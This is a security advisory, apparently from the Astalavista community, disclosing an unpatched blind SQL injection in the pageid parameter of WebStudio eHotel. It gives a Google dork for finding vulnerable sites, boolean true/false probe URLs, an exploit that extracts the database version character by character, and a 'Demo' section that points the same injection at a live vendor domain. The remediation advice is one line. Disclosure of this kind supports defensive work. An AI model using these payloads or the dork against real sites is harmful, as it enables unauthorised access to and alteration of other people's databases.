Application:  WebStudio eHotel

Vendor Name: BDigital Media Ltd

Vendors Url:  http://www.bdigital.biz

Bug Type:     WebStudio eHotel (pageid) Blind SQL Injection Vulnerability

Exploitation: Remote

Severity: Critical

Solution Status: Unpatched 

Google Dork:  "Powered by WebStudio" eHotel

 

Description:

 

WebStudio eHotel is prone to an SQL-injection vulnerability because it fails
to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application,
access or modify data, or exploit latent vulnerabilities in the underlying
database.

 

PoC:

 

http://localhost/index.php?pageid=50+and+1=1 ( TRUE  )

 

http://localhost/index.php?pageid=50+and+1=2 ( FALSE )

 

Exploit:

 

http://localhost/index.php?pageid=50+and+substring(@@version,1,1)=3 ( TRUE
)

 

http://localhost/index.php?pageid=50+and+substring(@@version,1,1)=4 ( FALSE
)

 

http://localhost/index.php?pageid=50+and+substring(@@version,1,1)=5 ( FALSE
)

 

Demo:

 

http://www.webstudioehotel.com/index.php?pageid=50+and+substring(@@version,1
,1)=3 ( TRUE  )

 

http://www.webstudioehotel.com/index.php?pageid=50+and+substring(@@version,1
,1)=4 ( FALSE )

 

http://www.webstudioehotel.com/index.php?pageid=50+and+substring(@@version,1
,1)=5 ( FALSE )

 

 

Solution:

 

There was no vendor-supplied solution at the time of entry.

 

Edit source code manually to ensure user-supplied input is correctly
sanitised.

 

 

Credits:

 

Charalambous Glafkos

Email:  glafkos (at) astalavista (dot) com

___________________________________________

ASTALAVISTA - the hacking & security community

www.astalavista.com

www.astalavista.net

 

 

 

Best Regards,
Charalambous Glafkos ( nowayout )
__________________________________________
ASTALAVISTA - the hacking & security community
 <http://www.astalavista.com/> www.astalavista.com
 <http://www.astalavista.net/> www.astalavista.net